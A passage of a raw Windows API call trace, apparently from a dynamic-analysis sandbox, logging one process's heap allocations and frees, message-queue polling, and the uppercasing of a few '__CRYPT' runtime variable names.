returned 0x2e54ce8 [0137.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0137.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0137.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0137.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c68 [0137.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0137.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0137.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0137.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c78 [0137.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0137.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0137.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0137.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0137.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0137.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0137.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0137.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0137.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0137.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15985) returned 0x2e90338 [0137.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0137.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0137.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0137.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0137.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0137.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0137.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0137.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0137.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0137.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0137.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0137.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0137.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0137.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0137.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0137.016] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0137.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0137.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0137.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0137.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0137.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0137.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0137.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0137.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0137.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0137.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0137.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0137.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0137.017] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0137.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0137.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0137.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0137.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0137.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0137.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0137.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0137.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0137.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0137.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0137.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0137.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0137.017] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0137.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0137.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0137.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0137.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0137.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0137.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0137.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0137.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0137.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0137.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0137.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0137.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0137.018] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0137.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0137.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0137.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0137.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0137.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0137.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0137.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0137.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0137.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0137.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0137.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0137.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0137.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0137.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0137.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0137.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0137.018] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0137.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0137.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0137.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0137.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0137.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0137.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0137.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0137.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0137.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0137.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0137.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0137.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0137.019] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0137.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0137.019] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0137.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0137.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0137.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0137.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0137.019] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0137.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0137.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0137.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0137.019] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0137.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0137.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0137.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0137.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0137.019] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0137.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0137.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0137.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0137.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0137.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0137.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0137.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0137.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0137.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0137.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0137.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0137.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0137.020] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0137.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0137.020] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0137.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff48 [0137.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0137.020] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0137.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff48 | out: hHeap=0x970000) returned 1 [0137.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0137.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0137.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0137.020] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0137.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0137.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0137.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0137.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0137.020] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0137.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0137.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0137.020] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0137.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0137.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0137.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0137.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0137.021] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0137.021] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0137.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0137.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0137.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0137.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0137.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0137.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0137.021] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0137.021] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0137.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0137.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0137.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0137.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0137.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0137.021] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0137.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0137.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0137.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0137.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0137.021] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0137.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0137.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0137.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0137.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0137.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0137.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0137.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0137.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0137.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0137.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0137.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0137.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0137.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0137.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0137.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0137.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0137.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0137.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0137.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0137.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0137.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0137.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0137.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0137.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0137.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0137.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0137.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0137.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0137.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0137.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0137.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0137.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0137.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0137.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0137.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0137.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0137.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0137.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0137.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0137.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0137.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0137.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0137.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0137.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0137.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0137.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0137.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0137.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0137.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0137.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea5cc8 | out: hHeap=0x970000) returned 1 [0137.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0137.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0137.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0137.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0137.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0137.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0137.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: 